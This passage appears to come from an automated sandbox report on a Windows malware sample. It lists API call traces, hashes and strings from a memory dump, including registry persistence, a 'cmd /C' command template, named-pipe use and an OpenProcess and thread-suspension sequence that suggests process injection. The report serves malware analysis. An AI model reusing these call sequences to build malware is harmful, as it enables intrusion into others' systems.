  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
